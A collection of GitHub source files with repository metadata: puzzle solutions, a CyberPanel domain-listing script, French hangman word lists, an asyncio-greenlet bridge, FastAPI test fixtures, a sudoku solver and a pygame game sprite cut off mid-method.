track', 'departure date', 'departure time', \n             'arrival location', 'arrival station', 'arrival platform', \n             'arrival track', 'class', 'duration', 'price', 'route', 'row', 'seat', \n             'train', 'type', 'wagon', 'zone']\n\n    answer, valid_tickets = task1(nearby_tickets, ranges)\n\n    valid_tickets.append([89,139,79,151,97,67,71,53,59,149,127,131,103,\n                          109,137,73,101,83,61,107])\n    util.call_and_print(task2, valid_tickets, ranges, names)\n\n","repo_name":"eschondorf/advent_of_code","sub_path":"2020/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74617654453","text":"#!/usr/local/CyberCP/bin/python\nimport sys\nimport os.path\nimport django\n\nsys.path.append('/usr/local/CyberCP')\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"CyberCP.settings\")\ntry:\n    django.setup()\nexcept:\n    pass\nfrom websiteFunctions.models import Websites\nimport argparse\nimport json\nfrom CLScript.CLMain import CLMain\n\n\nclass CloudLinuxDomains(CLMain):\n\n    def __init__(self, name, owner):\n        CLMain.__init__(self)\n        self.owner = owner\n        self.name = name\n\n    def listAll(self):\n
data = {}\n\n if self.owner !=None:\n websites = Websites.objects.filter(externalApp=self.owner)\n else:\n websites = Websites.objects.all()\n\n\n for webs in websites:\n if self.name != None:\n if self.name != webs.domain:\n continue\n data[webs.domain] = {\"owner\": webs.externalApp,\n \"document_root\": \"/home/%s/public_html/\" % (webs.domain),\n \"is_main\": True}\n for webs in webs.childdomains_set.all():\n data[webs.domain] = {\"owner\": webs.master.externalApp,\n \"document_root\": webs.path,\n \"is_main\": False}\n\n final = {'data': data, 'metadata': self.initialMeta}\n print(json.dumps(final))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='CyberPanel CloudLinux Manager')\n parser.add_argument('-o', '--owner', help='Owner')\n parser.add_argument('-n', '--name', help='Owner')\n\n args = parser.parse_args()\n\n pi = CloudLinuxDomains(args.name, args.owner)\n try:\n pi.listAll()\n except:\n pi.listAll()\n","repo_name":"usmannasir/cyberpanel","sub_path":"CLScript/CloudLinuxDomains.py","file_name":"CloudLinuxDomains.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1302,"dataset":"github-code","pt":"21"} +{"seq_id":"8995441014","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose:\r\n#\r\n# Author: Briche\r\n#\r\n# Created: 25/05/2021\r\n# Copyright: (c) Briche 2021\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\ndef main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\nfrom tkinter import *\r\nfrom PIL import*\r\nfrom PIL import ImageTk, Image\r\n\r\ndico = {\"Astronomie\":1,\"Fruits & Légumes\":2,\"Etats des USA\":3,\"Marques de voiture\":4,\"Animaux\":5}\r\n\r\ndico[\"Astronomie\"] = {\"Soleil\", \"Planète\",\"Terre\",\"Vénus\",\"Mars\",\"Jupiter\",\"Saturne\",\"Etoile\"\r\n \"Pulsar\" , \"Quasar\",\"Supernova\",\"Lune\" ,\"Lumière\",\"Astronaute\",\"Galiléé\",\"Copernic\",\"Keppler\",\"Newton\",\r\n \"Satellite\",\"Fusée\" , \"NASA\" ,\"Cosmos\",\"Espace\",\"Télescope\",\"Ciel\",\"Atmsophère\",\"Nuage\",\r\n \"Vaisseau\",\"Soucoupe\",\"Amas\",\"Anneau\",\"Apex\",\"Astéroide\",\"Astre\",\"Aube\",\"Aurore\",\"Boréale\",\r\n \"Azimiut\",\"Orbite\",\"Stellaire\",\"Constellation\",\"Crépuscule\",\"Galaxie\",\"Eclipse\",\"Equateur\",\r\n \"Equinoxe\",\"Géocentrique\",\"Héliocentrique\" , \"Gravitation\",\"Magnitude\",\"Nébuleuse\",\"Neutrons\",\r\n \"Neutrino\",\"Boson\",\"Parallaxe\",\"Pléiade\",\"Précession\" ,\"Solstice\",\"Zodiaque\",\"Photon\"}\r\n\r\ndico[\"Fruits & Légumes\"] = {\"Bananne\",\"Kiwi\",\"Pomme\",\"Carotte\",\"Céleri\",\"Rave\",\"Oignon\",\"Fraise\",\"Navet\",\"Concombre\",\r\n \"Pois\",\"Avocat\",\"Radis\",\"Pêche\",\"Poire\",\"Brugnon\",\"Courgette\",\"Tomate\",\"Courge\",\"Cornichon\"\r\n , \"Mangue\",\"Anannas\",\"Poireau\" ,\"Abricot\", \"Cassis\", \"Cerise\", \"Figue\", \"Framboise\", \"Groseille\",\r\n \"Melon\", \"Mirabelle\", \"Mûre\", \"Myrtille\", \"Pastèque\", \"Pêche\", \"Prune\" , \"Artichaut\", \"Aubergine\",\r\n \"Blette\", \"Brocolis\", \"Carotte\", \"Concombre\", \"Fenouil\", \"Fève\", \"Haricot vert\", \"Pomme de terre\"\r\n ,\"Topinambour\",\"Rutababga\" ,\"Choux\",\"Citrouille\" ,\"Potiron\" ,\"Mache\" , \"Batavia\" , \"Endive\",\"Pourpier\"\r\n \"Groseille\",\"Lentille\",\"Clémentine\",\"Mandarine\",\"Noix\"}\r\n\r\n\r\ndico[\"Etats des USA\"] = { \"Alabama\", \"Alaska\",\"Arizona\", \"Arkansas\", \"Californie\", 
\"Colorado\", \"Connecticut\", \"Delaware\", \"Floride\",\r\n \"Hawaï\", \"Idaho\", \"Illinois\", \"Indiana\", \"Iowa\", \"Kansas\", \"Kentucky\", \"Louisiane\", \"Maine\", \"Maryland\", \"Massachusetts\", \"Michigan\",\r\n \"Minnesota\", \"Mississippi\", \"Missouri\", \"Montana\", \"Nebraska\", \"Nevada\", \"New Hampshire\", \"New Jersey\", \"Nouveau-Mexique\",\r\n \"Hawaï\",\"New York\", \"Caroline du Nord\", \"Dakota du Nord\", \"Ohio\", \"Oklahoma\", \"Oregon\", \"Pennsylvanie\", \"Rhode Island\",\r\n \"Caroline du Sud\", \"Dakota du Sud\", \"Tennessee\", \"Texas\", \"Utah\", \"Vermont\", \"Virginie\" , \"Washington\",\r\n \"Virginie occidentale\", \"Wisconsin\" , \"Wyoming\" }\r\n\r\n\r\ndico[\"Marques de voiture\"] = {\"Lexus\",\"Toyota\",\"Porsche\",\"Renault\",\"Peugeot\",\"Ligier\",\"Toyota\",\"Kia\",\"Suzuki\",\"Cadillac\",\"Pontiac\",\"Dodge\",\"Hyundai\",\r\n \"Genesis\",\"Lincoln\" , \"Acura\",\"Volskwagen\",\"Audi\",\"BMW\" ,\"Chevrolet\" , \"Mitsubushi\" , \"Ram\", \"Mini\", \"Subaru\",\"Nissan\",\r\n \"Mazda\",\"Mercedes\",\"Infinity\", \"Volvo\",\"Chrysler\", \"Jagua\",\"Alfa Romeo\",\"Honda\",\"Land Rover\",\"Tesla\" ,\"Buick\",\r\n \"Citroen\",\"Fiat\",\"Corvette\",\"Ferrari\",\"Lamborghini\",\"Seat\",\"Skoda\",\"Opel\",\"Dacia\",\"Excalibur\",\"Aston-Martin\",\"Daihatsu\",\"Daimler\"\r\n \"Lada\",\"Matra\",\"Lancia\",\"Lotus\",\"McLaren\",\"Mega\",\"Mazerati\",\"Rover\",\"Simca\",\"Triumph\",\"Saaab\",\"Hummer\",\"Cupra\",\"Delorean\",\"Autobianchi\"}\r\n\r\n\r\n\r\ndico[\"Animaux\"] = {\"Girafe\", \"Zèbre\", \"Ane\", \"Antilope\", \"Buffle\", \"Watusis\", \"Dromadaire\", \"Rhinocéro\", \"Eléphant\", \"Hippopotame\", \"Phacochère\",\r\n \"Potamochère\", \"Mouflon\", \"Ibex\" ,\"Autruche\", \"Pélican\", \"Cormoran\", \"Grue\", \"Cigogne\", \"Jabirus\", \"Marabout\", \"Tantale\",\r\n \"Pintade\", \"Outarde\", \"Calaos\", \"Mouette\", \"Dendrocygne\", \"Tadorne\", \"Canard\", \"Ibis\", \"Spatule\", \"Aigrette\", \"Héron\",\r\n \"Flamant\" , \"Oryx\", \"Addax\", \"Hippotrague\", \"Eland\", \"Gnou\", \"Bongo\", \"Nyala\", \"Koudou\", \"Cobe\", \"Sitatunga\", \"Blesbok\",\r\n \"Springbok\", \"Impala\", \"Gazelle\", \"Rat\", \"Cochon\", \"Hamster\", \"Chinchilla\", \"Dègue\", \"Gerbille\", \"Souris\", \"Putois\",\r\n \"Furet\" , \"Iguane\", \"Geckos\", \"Caméléon\", \"Scorpion\", \"Araignée\", \"Myriapode\" , \"Perruche\", \"Perroquet\", \"Diamant\",\r\n \"Canaris\", \"Mainate\", \"Toucan\", \"Poule\", \"Dindon\", \"Paon\", \"Oie\", \"Canard\", \"Hérisson\"}\r\n\r\n# il faut relier un des dico a un theme","repo_name":"hwwrg/Jeu-du-Pendu","sub_path":"dico_pendu.py","file_name":"dico_pendu.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22545057267","text":"import asyncio\nfrom collections import deque\nimport functools\nimport sys\nfrom greenlet import greenlet, getcurrent\n\n\nclass GreenletBridge:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.starting = False\n self.running = False\n self.stopping = False\n self.bridge_greenlet = None\n self.wait_event = None\n self.scheduled = deque()\n\n def schedule(self, gl, *args, **kwargs):\n self.scheduled.append((gl, args, kwargs))\n if self.wait_event:\n self.wait_event.set()\n\n def run(self):\n async def async_run():\n self.starting = False\n self.stopping = False\n self.running = True\n while not self.stopping:\n self.wait_event.clear()\n while self.scheduled:\n gl, args, kwargs = 
self.scheduled.popleft()\n gl.switch(*args, **kwargs)\n await self.wait_event.wait()\n self.running = False\n\n # get the asyncio loop\n try:\n loop = asyncio.get_event_loop()\n except RuntimeError: # pragma: no cover\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n self.wait_event = asyncio.Event()\n if not loop.is_running():\n # neither the loop nor the bridge are running\n # start a loop with the bridge task\n loop.run_until_complete(async_run())\n else:\n # the loop is already running, but the bridge isn't\n # start the bridge as a task\n loop.create_task(async_run())\n\n def start(self):\n assert not self.running and not self.starting\n self.reset()\n self.starting = True\n self.schedule(getcurrent())\n self.switch()\n\n def stop(self):\n if self.running:\n self.stopping = True\n self.wait_event.set()\n self.bridge_greenlet.parent = getcurrent()\n self.bridge_greenlet.switch()\n\n def switch(self):\n if self.bridge_greenlet is None:\n self.bridge_greenlet = greenlet(self.run)\n if self.wait_event:\n self.wait_event.set()\n return self.bridge_greenlet.switch()\n\n\nbridge = GreenletBridge()\n\n\ndef async_(fn):\n @functools.wraps(fn)\n def decorator(*args, **kwargs):\n if not bridge.running and not bridge.starting:\n bridge.start()\n\n async def coro(fn, *args, **kwargs):\n future = asyncio.Future()\n\n def gl(future, fn, *args, **kwargs):\n try:\n future.set_result(fn(*args, **kwargs))\n except: # noqa: E722\n future.set_exception(sys.exc_info()[1])\n\n bridge.schedule(greenlet(gl), future, fn, *args, **kwargs)\n return await future\n\n return coro(fn, *args, **kwargs)\n\n return decorator\n\n\ndef await_(coro_or_fn):\n if asyncio.iscoroutine(coro_or_fn):\n # we were given a coroutine --> await it\n if not bridge.running:\n bridge.start()\n\n async def run_in_aio(gl):\n ret = None\n exc_info = None\n try:\n ret = await coro_or_fn\n except: # noqa: E722\n exc_info = sys.exc_info()\n bridge.schedule(gl, (ret, exc_info))\n\n asyncio.get_event_loop().create_task(run_in_aio(getcurrent()))\n ret, exc_info = bridge.switch()\n if exc_info:\n raise exc_info[0].with_traceback(exc_info[1], exc_info[2])\n return ret\n else:\n # assume decorator usage\n @functools.wraps(coro_or_fn)\n def decorator(*args, **kwargs):\n return await_(coro_or_fn(*args, **kwargs))\n\n return decorator\n","repo_name":"sourcery-ai-bot/greenletio","sub_path":"greenletio/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"27658677237","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\n# from mpl_toolkits.mplot3d import Axes3D\n\n\nclass Plot_pareto:\n def __init__(self):\n # Create coords directory\n if os.path.exists('./coords') == False:\n os.makedirs('./coords')\n print(\n '\\nCreating folder coords : Save coordinates of pareto values and fitness of all algorithms')\n # Create image directory\n if os.path.exists('./imgs') == False:\n os.makedirs('./imgs')\n print('\\nCreating folder imgs : Save image of each iteration')\n\n def show(self, fitness_, archive_fitness, i):\n # 3D plot for 3 objectives\n # if fitness_.shape[1] == 3:\n # fig = plt.figure()\n # ax = fig.add_subplot(111, projection='3d')\n # # ax.scatter(fitness_[:, 0], fitness_[:, 1],\n # # fitness_[:, 2], c='blue', marker='.')\n # ax.scatter(archive_fitness[:, 0], archive_fitness[:, 1],\n # archive_fitness[:, 2], c='red', marker='.')\n # ax.set_title('Iteration'+str(i+1))\n # 
ax.set_xlabel('fitness_y1')\n # ax.set_ylabel('fitness_y2')\n # ax.set_zlabel('fitness_y3')\n\n # 2D plot for 2 objectives\n if fitness_.shape[1] == 2:\n plt.title('MOPSO+_Iteration_'+str(i+1))\n plt.xlabel('fitness_y1')\n plt.ylabel('fitness_y2')\n plt.scatter(\n archive_fitness[:, 0], archive_fitness[:, 1], s=30, c='red', marker=\".\", alpha=1.0)\n\n plt.savefig('./imgs/MOPSO+_Iteration_'+str(i+1)+'.png')\n plt.close()\n","repo_name":"siddarthgopalakrishnan/hybrid-mopso","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"10522965750","text":"from dmc import gettoken\nimport http.client\nimport json\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nheaders = {\n \"X-CENTRIFY-NATIVE-CLIENT\": \"true\",\n \"X-CFY-SRC\": \"python\",\n \"Authorization\": \"Bearer %s\" % gettoken(\"YOUR_SCOPE\")\n}\nconn = http.client.HTTPSConnection(\"aaa0001-hk.my.centrify-dev.net\")\nconn.request(\"POST\", \"/security/whoami\", headers = headers)\nresponse = conn.getresponse()\nprint(response.status)\nret = json.loads(response.read().decode())\nprint(ret[\"Result\"][\"User\"])","repo_name":"centrify/dmc-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12681241520","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout\n\nfrom core import views\n\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^contato/$', views.contact, name='contact'),\n url(r'^entrar/$', login, {'template_name': 'login.html'}, name='login'),\n url(r'^sair/$', logout, {'next_page': 'index'}, name='logout'),\n url(r'^apresentacao/', views.apresentacao, name='presentation'),\n url(r'^solucao/', views.solucao, name='solution'),\n url(r'^monitoramento/', views.monitoramento, name='monitoring'),\n url(r'^emergencia/', views.emergencia, name='emergency'),\n url(r'^conta/', include('accounts.urls', namespace='accounts')),\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include('api.urls', namespace='api')),\n]\n","repo_name":"cesarbcruz/ProjectMobileHealth","sub_path":"MobileHealthWeb/mobilehealth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"168297472","text":"import numpy as np\nfrom dataset import dataset_all_2, dataset_all\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\"\"\"\nDo feature visualization task\n\"\"\"\n#%% read needed data\n# read the temperatures and spectra generated by uniform profiles\ndata_dir_0='./input/data_uniform/file'\nlabel_dir_0='./input/data_uniform/label'\nspec_0,temp_0,__,___=dataset_all(data_dir_0,label_dir_0)\n# read the temperatures and spectra generated by nonuniform profiles--5points\ndata_dir_1='./input/data_nonuniform/file'\nlabel_dir_1='./input/data_nonuniform/label'\norder_dir_1='./file_reading_order.csv'\nspec_1,_,__,__=dataset_all_2(data_dir_1,label_dir_1,order_dir_1)\ntemp_dif_dir='./input/temp_dif_data/1e-3/temp_dens_comp.csv'\ntemp_dif_select=np.loadtxt(temp_dif_dir)\ntemp_1=temp_dif_select[:,3]\n# read the temperatures and spectra generated by nonuniform 
profiles--10points\ndata_dir_2='./input/data_10p/file'\nlabel_dir_fake='./input/data_10p/label'\nspec_2,_1,_2,_3=dataset_all(data_dir_2,label_dir_fake)\nlabel_dir_2='./input/data_10p/dens_temp_10p.csv'\ntemp_2=np.loadtxt(label_dir_2)\n\ndata_all=np.vstack((spec_0[:500],spec_1[:500],spec_2[:500]))\n#%%\ndata_all_max=np.max(data_all,0)\ndata_all_min=np.min(data_all,0)\ndata_all_norm=(data_all-data_all_min)/(data_all_max-data_all_min)\n#%% TSNE\ntsne=TSNE(init='random',random_state=555,n_components=2)\nembedding=tsne.fit_transform(data_all_norm)\nx_min, x_max = embedding.min(0), embedding.max(0)\n# all_norm=embedding\nall_norm = (embedding - x_min) / (x_max - x_min) # normalization\nembed_0=all_norm[:500]\nembed_1=all_norm[500:1000]\nembed_2=all_norm[1000:1500]\n#%% plot figure\nplt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0[:,0],embed_0[:,1],c='k')\nplt.scatter(embed_1[:,0],embed_1[:,1],c='r')\nplt.scatter(embed_2[:,0],embed_2[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/T_SNE-2')\nplt.show()\nplt.close()\n\n#%% Linear Discriminant analysis\n# DATA SET PREPARE\nall_temp=np.hstack((temp_0[0:500],temp_1[0:500],temp_2[0:500]))\nall_temp_norm=(all_temp-all_temp.min())/(all_temp.max()-all_temp.min())\n# all_temp_reshape=all_temp.reshape([-1,1])\n# final_set=np.hstack((data_all,all_temp_reshape))\nfinal_set=np.zeros_like(data_all_norm)\nfor i in range(final_set.shape[0]):\n    final_set[i]=data_all_norm[i]+all_temp_norm[i] # merge temperature and spectral information\nlabel=np.zeros([1500,1]).squeeze()\nlabel[500:1000]=1\nlabel[1000:1500]=2\n#%% LDA, exclude the temperature information\nclf = LinearDiscriminantAnalysis(n_components=2)\nclf.fit(data_all_norm,label)\ntransform_data=clf.transform(data_all_norm)\ntransform_data=(transform_data-transform_data.min(0))/(transform_data.max(0)-transform_data.min(0))\nembed_0_new=transform_data[0:500]\nembed_1_new=transform_data[500:1000]\nembed_2_new=transform_data[1000:1500]\n#%% visualization\nplt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0_new[:,0],embed_0_new[:,1],c='k')\nplt.scatter(embed_1_new[:,0],embed_1_new[:,1],c='r')\nplt.scatter(embed_2_new[:,0],embed_2_new[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/LDA_no_aggregate')\nplt.show()\nplt.close()\n\n#%% train LDA model, include the temperature information\nclf = LinearDiscriminantAnalysis(n_components=2,store_covariance=True)\nclf.fit(final_set,label)\n\ntransform_data=clf.transform(final_set)\ntransform_data=(transform_data-transform_data.min(0))/(transform_data.max(0)-transform_data.min(0))\nembed_0_new=transform_data[0:500]\nembed_1_new=transform_data[500:1000]\nembed_2_new=transform_data[1000:1500]\n\n#%% visualization\nplt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0_new[:,0],embed_0_new[:,1],c='k')\nplt.scatter(embed_1_new[:,0],embed_1_new[:,1],c='r')\nplt.scatter(embed_2_new[:,0],embed_2_new[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/LDA_multiple')\nplt.show()\nplt.close()\n\n#%% 
tsne\ntsne=TSNE(init='random',random_state=555,n_components=2)\ntransform_data=tsne.fit_transform(final_set)\ntransform_data=(transform_data-transform_data.min(0))/(transform_data.max(0)-transform_data.min(0))\nembed_0_new=transform_data[0:500]\nembed_1_new=transform_data[500:1000]\nembed_2_new=transform_data[1000:1500]\n#%%\n# plt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0_new[:,0],embed_0_new[:,1],c='k')\nplt.scatter(embed_1_new[:,0],embed_1_new[:,1],c='r')\nplt.scatter(embed_2_new[:,0],embed_2_new[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/TSNE-multiple')\nplt.show()\nplt.close()","repo_name":"RalphKang/nonuniformity-effect-on-LAS--temperature-measurement","sub_path":"data_preprocess_postprocess/data_cluster_visulization.py","file_name":"data_cluster_visulization.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71923456053","text":"from typing import Dict, Generator\n\nimport pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.orm import Session\n\nfrom app import models, crud, schemas\nfrom app.core.config import settings\nfrom app.db.session import SessionLocal\nfrom app.main import app\nfrom app.tests.utils.user import authentication_token_from_email\nfrom app.tests.utils.utils import get_superuser_token_headers\nfrom mixer.backend.sqlalchemy import Mixer\n\nTEST_SALES_CONSULTANT_USER = \"sales-consultant@test.com\"\nTEST_CASHIER_USER = \"cashier@test.com\"\nTEST_PRODUCT_NAME = \"TEST PRODUCT\"\n\n\n@pytest.fixture(scope=\"session\")\ndef db() -> Generator:\n session: Session = SessionLocal()\n yield session\n session.rollback()\n session.close()\n\n\n@pytest.fixture(scope=\"module\")\ndef client() -> Generator:\n with TestClient(app) as c:\n yield c\n\n\n@pytest.fixture(scope=\"module\")\ndef superuser_token_headers(client: TestClient) -> Dict[str, str]:\n return get_superuser_token_headers(client)\n\n\n@pytest.fixture(scope=\"module\")\ndef normal_user_token_headers(client: TestClient, db: Session) -> Dict[str, str]:\n return authentication_token_from_email(\n client=client, email=settings.EMAIL_TEST_USER, db=db\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef sales_consultant_user_token_headers(client: TestClient, db: Session) -> Dict[str, str]:\n return authentication_token_from_email(\n client=client, email=TEST_SALES_CONSULTANT_USER, db=db, role=models.RoleUser.sales_consultant.value\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef cashier_user_token_headers(client: TestClient, db: Session) -> Dict[str, str]:\n return authentication_token_from_email(\n client=client, email=TEST_CASHIER_USER, db=db, role=models.RoleUser.cashier.value\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef mixer(db: Session):\n return Mixer(session=db, commit=False)\n\n\n@pytest.fixture\ndef test_product(db: Session) -> models.Product:\n product = db.query(models.Product).filter(models.Product.name == TEST_PRODUCT_NAME).first()\n if not product:\n product = crud.product.create(db, obj_in=schemas.CreateProduct(\n name=TEST_PRODUCT_NAME,\n price=100\n ))\n return product\n\n\n@pytest.fixture\ndef test_order_created(db: Session, test_product) -> models.Product:\n order = db.query(models.Order).filter(models.Order.product_id == test_product.id).first()\n if not order:\n order = crud.product.create(db, 
obj_in=schemas.CreateOrder(\n product_id=test_product.id\n ))\n if order.bill:\n crud.bill.remove(db, id=order.bill.id)\n\n order.status = models.OrderStatuses.created.value\n\n db.add(order)\n db.commit()\n db.refresh(order)\n return order\n\n\n@pytest.fixture\ndef test_order_ready(db: Session, test_order_created) -> models.Product:\n test_order_created.status = models.OrderStatuses.ready.value\n\n db.add(test_order_created)\n db.commit()\n db.refresh(test_order_created)\n return test_order_created\n","repo_name":"DImasBo/ecommerce-testove","sub_path":"backend/app/app/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45695344","text":"list1=[1,2,3,4,5]\nlist2=[2,4,6,8,10]\na=len(list1)\nb=len(list2)\nif(a==b):\n print(\"both lists have same length \",a)\nelse:\n print(\"both have different lengths\",a,b)\nif(sum(list1)==sum(list2)):\n print(\"both the sum are same\")\nelse:\n print(\"both the sums are not same\")\nprint(\"common element are\")\nfor i in list1:\n for j in list2:\n if(i==j):\n print(i)","repo_name":"amalbabu2024/amal","sub_path":"amal/expno15.py","file_name":"expno15.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20117418168","text":"import re\n\nwith open('input.txt', 'r') as f:\n count = 0\n for line in f.readlines():\n data = line.split('\\n')[0]\n\n match_pairs = re.match(r'[a-z]*([a-z]{2})[a-z]*\\1[a-z]*', data)\n match_consec = re.match(r'[a-z]*([a-z])[a-z]\\1[a-z]*', data)\n if match_pairs and match_consec:\n count += 1\n \n print(count)\n","repo_name":"rubengrootroessink/AdventOfCode","sub_path":"2015/05/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28826161532","text":"from ColorChalks import ColorChalks\n\nN = 9\ndef print_board(board):\n for i in range(9):\n for j in range(9):\n print([board[i][j]], end=\"\")\n print()\n\n\n# a function to check if its possible to place a number in given position or not\ndef possible(board, row, col, num):\n for x in range(9):\n if board[row][x] == num:\n return False\n \n if board[x][col] == num:\n return False\n \n # Check for 3 x 3 matrix\n startrow = row - row % 3\n startcol = col - col % 3\n for i in range(3):\n for j in range(3):\n if board[i + startrow][j + startcol] == num:\n return False\n \n return True\n\ndef solve(board, row, col): \n if(row == N - 1 and col == N):\n return True\n \n if col == N: \n row += 1\n col = 0\n\n ## if col is not empty, then move on to next col\n if board[row][col] != 0:\n return solve(board, row, col+1)\n \n for num in range(1, N + 1):\n if possible(board, row, col, num) == True: \n board[row][col] = num\n if solve(board, row, col+1):\n return True\n board[row][col] = 0\n \n return False\n\n\nl = list();\nboard = list()\nprint(ColorChalks.FCOLORS.Blue + \"Enter Rows of sudoku board (0 for empty places) i.e. 
100200090\")\nfor i in range(9):\n print(ColorChalks.FCOLORS.Yellow + \"EnterRow\", i + 1)\n n = str(input(\"\\n: \"))\n l.append(n)\nfor x in l:\n n = [*x]\n board.append(n)\nfor y in range(9):\n for w in range(9):\n board[y][w] = int(board[y][w])\nfor rows in range(9): \n print(board[rows])\n\n\nif (solve(board, 0, 0)):\n print(ColorChalks.FCOLORS.Green + \"\\nSolution: \")\n print_board(board)\nelse: \n print(\"no soluiton\")","repo_name":"Sagar-Sharma-7/Sudoku-Solver-CLI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"47340323254","text":"#!/usr/bin/env python\n\nimport logging\nimport pygame\nimport pygame.locals\n\nimport basicSprite\n\n\n_moduleLogger = logging.getLogger(__name__)\n\n\nSUPER_STATE_START = pygame.USEREVENT + 1\nSUPER_STATE_OVER = SUPER_STATE_START + 1\nPLAYER_EATEN = SUPER_STATE_OVER + 1\n\n\nclass greenMan(basicSprite.Sprite):\n\tdef __init__(self, centerPoint, image):\n\t\tbasicSprite.Sprite.__init__(self, centerPoint, image)\n\t\tself.pellets = 0\n\t\tself.x_dist = 8\n\t\tself.y_dist = 8\n\t\tself.xMove = 0\n\t\tself.yMove = 0\n\t\tself.superState = False\n\n\tdef MoveKeyDown(self, key):\n\t\tif (key == pygame.locals.K_RIGHT):\n\t\t\tself.xMove += self.x_dist\n\t\telif (key == pygame.locals.K_LEFT):\n\t\t\tself.xMove += -self.x_dist\n\t\telif (key == pygame.locals.K_UP):\n\t\t\tself.yMove += -self.y_dist\n\t\telif (key == pygame.locals.K_DOWN):\n\t\t\tself.yMove += self.y_dist\n\n\tdef MoveKeyUp(self, key):\n\t\tif (key == pygame.locals.K_RIGHT):\n\t\t\tself.xMove += -self.x_dist\n\t\telif (key == pygame.locals.K_LEFT):\n\t\t\tself.xMove += self.x_dist\n\t\telif (key == pygame.locals.K_UP):\n\t\t\tself.yMove += self.y_dist\n\t\telif (key == pygame.locals.K_DOWN):\n\t\t\tself.yMove += -self.y_dist\n\n\tdef update(self, block_group, pellet_group, super_pellet_group, monster_group):\n\t\tif (self.xMove==0)and(self.yMove==0):\n\t\t\treturn\n\t\tself.rect.move_ip(self.xMove, self.yMove)\n\t\tif pygame.sprite.spritecollideany(self, block_group):\n\t\t\tself.rect.move_ip(-self.xMove, -self.yMove)\n\t\tlst_monsters = pygame.sprite.spritecollide(self, monster_group, False)\n\t\tif (len(lst_monsters)>0):\n\t\t\tself.MonsterCollide(lst_monsters)\n\t\telse:\n\t\t\tlstCols = pygame.sprite.spritecollide(self, pellet_group, True)\n\t\t\tif (len(lstCols)>0):\n\t\t\t\tself.pellets += len(lstCols)\n\t\t\telif (len(pygame.sprite.spritecollide(self, super_pellet_group, True))>0):\n\t\t\t\tself.superState = True\n\t\t\t\tpygame.event.post(pygame.event.Event(SUPER_STATE_START, {}))\n\t\t\t\tpygame.time.set_timer(SUPER_STATE_OVER, 0)\n\t\t\t\tpygame.time.set_timer(SUPER_STATE_OVER, 8000)\n\n\tdef MonsterCollide(self, 